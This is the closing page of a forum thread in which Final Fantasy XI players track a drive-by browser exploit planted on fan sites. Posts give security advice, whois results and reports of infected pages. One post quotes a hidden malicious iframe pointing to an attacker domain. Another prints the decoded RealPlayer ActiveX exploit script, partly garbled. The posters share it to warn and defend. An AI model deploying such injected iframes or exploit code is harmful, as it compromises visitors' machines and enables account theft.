Item Search
     
BG-Wiki Search
+ Reply to Thread
Page 11 of 11 FirstFirst ... 9 10 11
Results 201 to 211 of 211
  1. #201
    Ratznest
    Guest

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Hello all. I usually spend my time reading posts and lurking, but recent events have drawn me out of hiding.

    My job in real life is as a computer system security tech, and I have my CISSP. I have been reading every post I can find, each symptom, behavior, to figure out what could have caused it. It's very difficult to pinpoint considering the wide variety of OS platforms, browsers in use and sites people visit.

    However, a bit of parallel research at my job yesterday did shed a bit of light. (Note - I cannot post where I got this info. Even if I could, most people reading this would not be able to access the site. I apologize for not being able to link it.)

    In Sept and Oct of this year, I received several security alerts regarding IE, Firefox, RealPlayer and Apple Quicktime. They were new security vulnerabilities discovered, and only 3 had public exploits known to be available. All of them noted that the aforementioned media applications could be used to execute malicious code through the browsers and run programs on a PC viewing a website. These new vulnerabilities would be perfect to hit, as anyone not updating their virus scans would totally miss them... Even on Firefox.

    I recieve hundreds of these alerts, so these didn't seem particularly bad at the time. We patch, we update, we go on... we stay paranoid in the security dept at my work. :)

    Personally, these alerts seem to be the ones that opened the holes I am seeing. As for what the malicious code is putting onto the PC's is anyone's guess after that point. Once open, they can do anything your current user has rights to do. Consider opening your browser with limited rights, as this will help guard against new threats a virus scanner won't pick up.

    Update all your programs, not just virus scans, firewalls and operating systems. The current trend among "hackers" is away from hacking the operating systems, and they are targeting plugins more lately.

    I hope this information helps prevent more of us from having our accounts stolen.
    ________________________________
    Security holes since Sept 06: IE - 11, Firefox - 8, Mac OS X - 7, Windows PC OS's - 31+, Internet Protocols - 9 ... you're not safe no matter what you use.

  2. #202
    Melee Summoner
    Join Date
    Jan 2008
    Posts
    25
    BG Level
    1

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Just an fyi... yes my site was temporarily hacked. As were the other 8 sites on my server. It was pretty much harmless all they did was change the index pages. I contacted my host and changed all my passwords and the site is back up and running fine.

    Apnea

  3. #203
    Puppetmaster
    Join Date
    Nov 2007
    Posts
    62
    BG Level
    2
    FFXI Server
    Leviathan

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Big big warning : ffxi-atlas.com is infected.

    Iframe at the bottom right under the little affliate banners , little black box, similar to somepage.com

    Contains:

    " <iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe> "

    which contains the bogus javascript code (I guess similar realplayer exploit as one of my lsmates got the realplayer warning).

    Please pass this information on.

    http://ao.legionhq.org/atlas.jpg

  4. #204
    Salvage Bans
    Join Date
    Dec 2005
    Posts
    953
    BG Level
    5

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Quote Originally Posted by ramp
    Big big warning : ffxi-atlas.com is infected.

    Iframe at the bottom right under the little affliate banners , little black box, similar to somepage.com

    Contains:

    " <iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe> "

    which contains the bogus javascript code (I guess similar realplayer exploit as one of my lsmates got the realplayer warning).

    Please pass this information on.
    Removed, thanks for the info. Looking into how it got there......anyone know if any unpatched security holes in apache/php/phpbb?

  5. #205
    Salvage Bans
    Join Date
    Dec 2005
    Posts
    953
    BG Level
    5

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Looks like they're using the Real Audio exploit and ActiveX.

    The decoded the javascript comes to

    Code:
    <!-- ScRIpT language=jAvAsCrIpT>
    kxmz="Gd"
    ldzi="dp"
    hjlo="cP"
    wyad="DG"
    mjhb="xf"
    qjyf="up"
    gomv="pP"
    esih="PC"
    vahe="sl"
    bwaj="Pe"
    qptw="pu"
    lupe="Pe"
    gmsq="CE"
    qaxo="WE"
    jsps="pO"
    qerd="OU"
    upyd="fQ"
    mmsr="ph"
    pjqp="kM"
    yfss="Lu"
    umso="pE"
    xeqx="SO"
    thrb="ou"
    xies="Vp"
    ulaz="XO"
    pggs="oU"
    nluv="Fp"
    glqf="lE"
    ocbv="Qu"
    ichu="Fh"
    vcix="kG"
    ymzo="EC"
    eigs="LX"
    hkub="kw"
    vqwo="TR"
    guki="nw"
    xein="xp"
    vczs="sO"
    yxfg="Ee"
    qwhg="fH"
    jafj="Kg"
    nhlf="VR"
    xtmv="pP"
    wngm="SO"
    hmfq="ec"
    hkxf="Cl"
    pmaf="yd"
    yufh="Yd"
    tjry="qz"
    edks="MP"
    enjr="sl"
    ayig="eC"
    ctie="sM"
    pjfw="kp"
    cqjs="ok"
    roye="NQ"
    ubem="pC"
    egvc="JM"
    btcd="fg"
    qite="tP"
    svkg="xL"
    sfad="AL"
    ydxw="Kp"
    vkqm="MP"
    wxlb="cm"
    kywx="ZT"
    ygjf="PN"
    nzst="Ko"
    olbv="qc"
    ngop="Ka"
    muir="OG"
    gqkt="eN"
    itdq="WE"
    tkqr="NX"
    fswz="kU"
    sdjo="NB"
    akxy="TP"
    xuxu="CM"
    cige="mf"
    wnll="VX"
    rhwh="KP"
    dajx="Ld"
    iael="Kx"
    acvb="ku"
    omrq="Nq"
    vbhf="LP"
    hokj="Sm"
    pjxe="MX"
    giib="kP"
    naed="Dh"
    qwzq="KP"
    jdiw="cl"
    omzz="ej"
    civk="KE"
    jgii="ne"
    ikyl="yL"
    msdy="sN"
    trfx="XE"
    pczp="GO"
    snyl="OO"
    jdmy="OO"
    syrx="oh"
    ufub="nT"
    zzst="NP"
    tdza="nN"
    shqt="Ll"
    pmuj="aW"
    xpwj="iN"
    mgwo="uK"
    odzf="xY"
    yfjp="Ho"
    ljir="nX"
    nkog="Zp"
    jdqf="Ng"
    aucy="nM"
    woge="hn"
    gqty="Rg"
    nfxy="sc"
    gaty="VQ"
    quas="jb"
    diks="Og"
    pniu="pF"
    iumj="xW"
    nthi="dw"
    baua="Tg"
    nlqn="PS"
    dkqf="jr"
    loxk="OB"
    bqhl="Og"
    irwb="GW"
    whss="wg"
    tlbl="wr"
    kgrx="Nw"
    lcho="Pv"
    yepj="LV"
    vzdh="Qw"
    qevl="IV"
    lxln="OV"
    bbjy="nF"
    mxuz="lf"
    pbao="nF"
    fmbo="Iv"
    cdil="ER"
    qhww="nf"
    irru="cv"
    wner="Ov"
    iwcd="MB"
    pkpn="oW"
    cfnb="pF"
    swbb="aw"
    bamn="Dv"
    uvhs="SF"
    mynm="hb"
    ltgd="ov"
    bnpi="lf"
    agqo="Qw"
    hnvk="Cg"
    xnmp="Du"
    eqto="OG"
    fvnj="pF"
    otyn="ag"
    exuj="Tf"
    runn="sF"
    rscr="xr"
    puor="oG"
    qtmq="Pf"
    xstq="aW"
    uoti="tV"
    yxrz="cV"
    xgax="xR"
    olmt="Nv"
    kccj="Eg"
    ktkw="hv"
    wvev="EP"
    pddu="P"
    djsw="TY"
    psqq="XX"
    atdr="XX"
    qwbe="fi"
    obom="Aq"
    fodb="cY"
    xpxh="fP"
    wufy="AA"
    njlo="ei"
    sugg="Ao"
    stps="HF"
    zgpo="XZ"
    jzfq="Pi"
    pzic="Ak"
    aoed="jb"
    ojuj="rI"
    uwxl="Pi"
    oxbp="Ag"
    ppvv="Vb"
    lpmd="aa"
    thwz="Pi"
    qohc="Ac"
    mtzn="kw"
    touu="zO"
    krrn="PL"
    bhee="iA"
    zbka="sl"
    xexm="oU"
    dtfn="WP"
    hpdp="iA"
    ryan="Zc"
    lpjr="za"
    somv="bP"
    chun="iA"
    iybi="Vq"
    ghyc="Kp"
    zfwi="AP"
    ljbe="iA"
    axyd="RC"
    lwrq="pD"
    ehyj="XP"
    pdbd="Ql"
    azku="aa"
    kfvn="Tb"
    rlnl="aa"
    adfg="aL"
    ymkk="tU"
    towd="AA"
    drsg="AA"
    mdep="CF"
    nzdk="ia"
    igqg="aP"
    ofvv="oH"
    yftm="Hm"
    ukaj="Da"
    fzdu="hi"
    cmlk="va"
    qofl="bo"
    dtvg="wa"
    vqqw="bX"
    dhlo="kn"
    bvwh="EN"
    blnc="Ij"
    tkpa="dp"
    jnvz="PP"
    zsjd="PP"
    jbfh="pU"
    wrwx="ov"
    slzr="dz"
    ihqh="As"
    ckmn="Pp"
    hdll="PP"
    knnx="pP"
    jwuh="Ph"
    oqyq="kt"
    jrow="pp"
    umee="lX"
    qxhz="Kw"
    hcpu="pq"
    sluo="lz"
    phcg="mh"
    ugrj="KV"
    diqh="HP"
    ewwh="xX"
    seqc="Ko"
    wyxw="Gf"
    cfnv="ZP"
    yqux="tu"
    iqib="YN"
    cfdy="hD"
    mwzh="tp"
    hpxr="pP"
    xian="pP"
    zrtn="pN"
    wqyt="Bo"
    vyqa="Yf"
    bhui="Xf"
    faio="of"
    bcqq="NP"
    ncvq="PP"
    uszl="pF"
    vjwl="hG"
    bcmn="Eg"
    jrmk="Bv"
    ebed="LF"
    ayls="me"
    gsfj="tO"
    vqvp="oa"
    sbew="fX"
    ihme="KN"
    cjuf="xn"
    kclq="hB"
    csdl="nP"
    mgpy="pP"
    kokn="pP"
    cnce="PH"
    efhw="Cn"
    lutg="LR"
    hgnw="PX"
    xntf="Km"
    ebhj="lV"
    lgzt="Jr"
    alwd="pu"
    farx="co"
    nyyl="Oe"
    zcug="fP"
    dmjm="Dl"
    rfmr="gp"
    wwix="tp"
    vett="SU"
    lbfg="lV"
    dlvf="qR"
    davr="NV"
    yntp="eL"
    mfpz="PR"
    acqc="OD"
    eqka="UC"
    xdzj="TV"
    bnry="ER"
    qycq="SI"
    rrqh="ON"
    kk();
    function kk()
    {
    	var user = navigator.userAgent.toLowerCase();
    	if(user.indexOf("nt 5.")==-1)
    		return;
    	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
    		return;
    
    	try
    	{
    		Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
    	}catch(error)
    	{
    		return;
    	}
    	werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
    	sfsdf = "";
    	jiji = unescape("%75%06%74%04");
    	for(i=0;i<32*148;i++)
    		sfsdf += "S";
    
    	
    	if(werq.indexOf("6.0.14.") == -1)
    	{
    		if(navigator.userLanguage.toLowerCase() == "zh-cn")
    			ret = unescape("%7f%a5%60");
    		else if(navigator.userLanguage.toLowerCase() == "en-us")
    			ret = unescape("%4f%71%a4%60");
    		else
    			return;
    	}
    	else if(werq == "6.0.14.544")
    		ret = unescape("%63%11%08%60");
    	else if(werq == "6.0.14.550")
    		ret = unescape("%63%11%04%60");
    	else if(werq == "6.0.14.552")
    		ret = unescape("%79%31%01%60");
    	else if(werq == "6.0.14.543")
    		ret = unescape("%79%31%09%60");
    	else if(werq == "6.0.14.536")
    		ret = unescape("%51%11%70%63");
    	else
    		return;
    
    	\"c:\\Program Files\\";
    	iusd  = "NetMeeting\\TestSnd";
    	Real.Imporkswdf +iusd + ".wav", gogo,"", 0, 0);
    }
    
    </sCrIpT>

  6. #206
    New Merits
    Join Date
    Dec 2007
    Posts
    235
    BG Level
    4
    FFXI Server
    Ifrit

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    did a whois on playonlnie.com:

    Domain Name: PLAYONLNIE.COM
    Registrar: BIZCN.COM, INC.
    Whois Server: whois.bizcn.com
    Referral URL: http://www.bizcn.com
    Name Server: NS1.MYHOSTADMIN.NET
    Name Server: NS2.MYHOSTADMIN.NET
    Status: clientDeleteProhibited
    Status: clientTransferProhibited
    Updated Date: 12-jan-2008
    Creation Date: 12-jan-2008
    Expiration Date: 12-jan-2009

    http://www.bizcn.com is a chinese domain registration website, and from the looks of it, the RMT just set this new attack up recently (jan 12), so be safe people...

    China attacking again!!

  7. #207
    Relic Weapons
    Join Date
    Jun 2007
    Posts
    393
    BG Level
    4
    FFXI Server
    Alexander

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Do not know if this is related to any of these, but in the last hour I have had numerous inbound scaning attempts from these remote addresses while viewing bg only.

    Remote address: 76.253.167.79 and 76.16.79.92
    Remote port:53205 and 36271
    dns were comcast.net and sbcglobal.net

    Both were blocked, but I have never had either of these in my alert logs before. I have also never had any alerts pop up while viewing bg before either.

  8. #208
    New Spam Forum
    Join Date
    Jul 2007
    Posts
    179
    BG Level
    3

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Looks like AVG was compromised too although it's not targeted at FFXI. If you visited the AVG download page recently you might want to double check to make sure you are not affected by this.

    http://news.yahoo.com/s/infoworld/20...9gynp8J2YjtBAF

  9. #209
    New Merits
    Join Date
    Jun 2007
    Posts
    232
    BG Level
    4
    FFXI Server
    Odin

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Quote Originally Posted by Fodder
    Looks like AVG was compromised too although it's not targeted at FFXI. If you visited the AVG download page recently you might want to double check to make sure you are not affected by this.

    http://news.yahoo.com/s/infoworld/20...9gynp8J2YjtBAF
    You might wanna read that again, the company that got hacked was AvSoft Technologies which makes smartCOP and smartdog products, while AVG is created by a company called Grisoft. The only mention of AVG in there was a quote from their chief research officer.

  10. #210
    I Am, Who I Am.
    Join Date
    Nov 2005
    Posts
    15,994
    BG Level
    9
    FFXIV Character
    Trixi Sephyuyx
    FFXIV Server
    Excalibur
    FFXI Server
    Ragnarok

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    lul, just got a mcafee message blocking a trojan coming from a google ad on ffxi-atlas.

  11. #211
    CoP Dynamis
    Join Date
    Nov 2005
    Posts
    255
    BG Level
    4

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Iframe is up on ffxiah.com right under the first server name on the main page. Noscript blocked it.

Similar Threads

  1. Installing FFXI on the 360
    By subzero1313 in forum FFXI: Everything
    Replies: 6
    Last Post: 2009-05-11, 07:43
  2. FFXI addiction, good on the wallet?
    By Faithe in forum FFXI: Everything
    Replies: 34
    Last Post: 2008-11-29, 12:09
  3. Is there an exploit on ffxi-atlas?
    By Brike in forum FFXI: Everything
    Replies: 64
    Last Post: 2008-03-13, 08:17
  4. FFXI on the Ipod
    By Excalin Garisk in forum FFXI: Everything
    Replies: 54
    Last Post: 2006-08-11, 03:03